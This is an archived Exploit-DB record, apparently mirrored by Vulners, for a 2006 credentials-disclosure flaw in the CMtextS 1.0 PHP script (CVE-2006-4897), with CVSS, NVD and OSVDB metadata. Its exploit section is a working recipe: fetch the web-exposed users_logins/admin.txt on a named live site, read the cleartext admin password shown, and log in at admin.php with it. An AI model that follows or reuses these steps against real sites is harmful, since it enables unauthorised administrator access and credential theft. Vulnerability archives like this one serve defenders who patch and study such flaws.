Search...

CMtextS <= 1.0 users_logins/admin.txt Credentials Disclosure Vuln

2006-09-17T00:00:00

ID EDB-ID:2388
Type exploitdb
Reporter Kacper
Modified 2006-09-17T00:00:00

Description

CMtextS <= 1.0 (users_logins/admin.txt) Credentials Disclosure Vuln. CVE-2006-4897. Webapps exploit for php platform

                                        
                                            :::::::::  :::::::::: :::     ::: ::::::::::: :::        
:+:    :+: :+:        :+:     :+:     :+:     :+:        
+:+    +:+ +:+        +:+     +:+     +:+     +:+        
+#+    +:+ +#++:++#   +#+     +:+     +#+     +#+        
+#+    +#+ +#+         +#+   +#+      +#+     +#+        
#+#    #+# #+#          #+#+#+#       #+#     #+#        
#########  ##########     ###     ########### ########## 
::::::::::: ::::::::::     :::     ::::    ::::  
    :+:     :+:          :+: :+:   +:+:+: :+:+:+ 
    +:+     +:+         +:+   +:+  +:+ +:+:+ +:+ 
    +#+     +#++:++#   +#++:++#++: +#+  +:+  +#+ 
    +#+     +#+        +#+     +#+ +#+       +#+ 
    #+#     #+#        #+#     #+# #+#       #+# 
    ###     ########## ###     ### ###       ### 
	
	
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-   - - [DEVIL TEAM THE BEST POLISH TEAM] - -
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- CMtextS &lt;= 1.0 Read Admin Password Vulnerability
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- [Script name: CMtextS 1.0
- [Script site: http://cmtexts.calctc.com/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-          Find by: Kacper (a.k.a Rahim)
+
-    DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam
+
-          Contact: kacper1964@yahoo.pl
-                        or
-           http://www.rahim.webd.pl/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Special Greetz: DragonHeart ;-)
- Ema: Leito, Leon, Adam, DeathSpeed, Drzewko, pepi, mivus
-                 SkD, nukedclx, Ramzes
-
- Greetz for all users DEVIL TEAM IRC Channel !!
!@ Przyjazni nie da sie zamienic na marne korzysci @!
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-            Z Dedykacja dla osoby,
-         bez ktorej nie mogl bym zyc...
-           K.C:* J.M (a.k.a Magaja)
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit:

http://www.cmtexts.pl/path/users_logins/admin.txt

exemple:
http://cmtexts.calctc.com/users_logins/admin.txt
Read:
lolskr3czulol|zmien has.o na jakie chcesz|muisz zmieni.!
&gt; lolskr3czulol &lt; Admin password.

Now go to:
http://cmtexts.calctc.com/admin.php

Login: Admin
pass: lolskr3czulol

greetz ;-)

#DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam

# milw0rm.com [2006-09-17]

JSON Vulners Source

Initial Source

{"hash": "5218735b311da5073dfda98962f9a6faeb9b97f4a0f86bd8e3f870b532e0e0a7", "id": "EDB-ID:2388", "lastseen": "2016-01-31T16:09:00", "viewCount": 2, "bulletinFamily": "exploit", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "edition": 1, "history": [], "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/2388/", "description": "CMtextS <= 1.0 (users_logins/admin.txt) Credentials Disclosure Vuln. CVE-2006-4897. Webapps exploit for php platform", "title": "CMtextS <= 1.0 users_logins/admin.txt Credentials Disclosure Vuln", "sourceData": "::::::::: :::::::::: ::: ::: ::::::::::: ::: \n:+: :+: :+: :+: :+: :+: :+: \n+:+ +:+ +:+ +:+ +:+ +:+ +:+ \n+#+ +:+ +#++:++# +#+ +:+ +#+ +#+ \n+#+ +#+ +#+ +#+ +#+ +#+ +#+ \n#+# #+# #+# #+#+#+# #+# #+# \n######### ########## ### ########### ########## \n::::::::::: :::::::::: ::: :::: :::: \n :+: :+: :+: :+: +:+:+: :+:+:+ \n +:+ +:+ +:+ +:+ +:+ +:+:+ +:+ \n +#+ +#++:++# +#++:++#++: +#+ +:+ +#+ \n +#+ +#+ +#+ +#+ +#+ +#+ \n #+# #+# #+# #+# #+# #+# \n ### ########## ### ### ### ### \n\t\n\t\n+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n+\n- - - [DEVIL TEAM THE BEST POLISH TEAM] - -\n+\n+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n+\n- CMtextS <= 1.0 Read Admin Password Vulnerability\n+\n+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n+\n- [Script name: CMtextS 1.0\n- [Script site: http://cmtexts.calctc.com/\n+\n+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n+\n- Find by: Kacper (a.k.a Rahim)\n+\n- DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam\n+\n- Contact: kacper1964@yahoo.pl\n- or\n- http://www.rahim.webd.pl/\n+\n+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n+\n- Special Greetz: DragonHeart ;-)\n- Ema: Leito, Leon, Adam, DeathSpeed, Drzewko, pepi, mivus\n- SkD, nukedclx, Ramzes\n-\n- Greetz for all users DEVIL TEAM IRC Channel !!\n!@ Przyjazni nie da sie zamienic na marne korzysci @!\n+\n+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n+\n- Z Dedykacja dla osoby,\n- bez ktorej nie mogl bym zyc...\n- K.C:* J.M (a.k.a Magaja)\n+\n+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nExploit:\n\nhttp://www.cmtexts.pl/path/users_logins/admin.txt\n\nexemple:\nhttp://cmtexts.calctc.com/users_logins/admin.txt\nRead:\nlolskr3czulol|zmien has.o na jakie chcesz|muisz zmieni.!\n> lolskr3czulol < Admin password.\n\nNow go to:\nhttp://cmtexts.calctc.com/admin.php\n\nLogin: Admin\npass: lolskr3czulol\n\ngreetz ;-)\n\n#DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam\n\n# milw0rm.com [2006-09-17]\n", "objectVersion": "1.0", "cvelist": ["CVE-2006-4897"], "published": "2006-09-17T00:00:00", "osvdbidlist": ["28953"], "references": [], "reporter": "Kacper", "modified": "2006-09-17T00:00:00", "href": "https://www.exploit-db.com/exploits/2388/"}

{"cve": [{"lastseen": "2017-10-19T11:12:32", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/28999", "http://www.vupen.com/english/advisories/2006/3690", "https://www.exploit-db.com/exploits/2388"], "description": "CMtextS 1.0 and earlier stores users_logins/admin.txt under the web document root with insufficient access control, which allows remote attackers to obtain the administrator password.", "edition": 3, "reporter": "NVD", "published": "2006-09-19T18:07:00", "title": "CVE-2006-4897", "type": "cve", "enchantments": {"score": {"modified": "2017-10-19T11:12:32", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2006-4897"], "scanner": [], "modified": "2017-10-18T21:29:26", "cpe": ["cpe:/a:cmtexts:cmtexts:1.0"], "id": "CVE-2006-4897", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4897", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:25", "references": [], "edition": 1, "description": "# No description provided by the source\n\n## References:\nVendor URL: http://cmtexts.calctc.com/\n[Secunia Advisory ID:21988](https://secuniaresearch.flexerasoftware.com/advisories/21988/)\nGeneric Exploit URL: http://milw0rm.com/exploits/2388\nFrSIRT Advisory: ADV-2006-3690\n[CVE-2006-4897](https://vulners.com/cve/CVE-2006-4897)\n", "reporter": "OSVDB", "published": "2006-09-17T13:03:51", "type": "osvdb", "title": "CMtextS admin.txt Cleartext Password Disclosure", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2006-4897"], "modified": "2006-09-17T13:03:51", "href": "https://vulners.com/osvdb/OSVDB:28953", "id": "OSVDB:28953", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}]}

CMtextS &lt;= 1.0 users_logins/admin.txt Credentials Disclosure Vuln

Description

CMtextS <= 1.0 (users_logins/admin.txt) Credentials Disclosure Vuln. CVE-2006-4897. Webapps exploit for php platform

CMtextS <= 1.0 users_logins/admin.txt Credentials Disclosure Vuln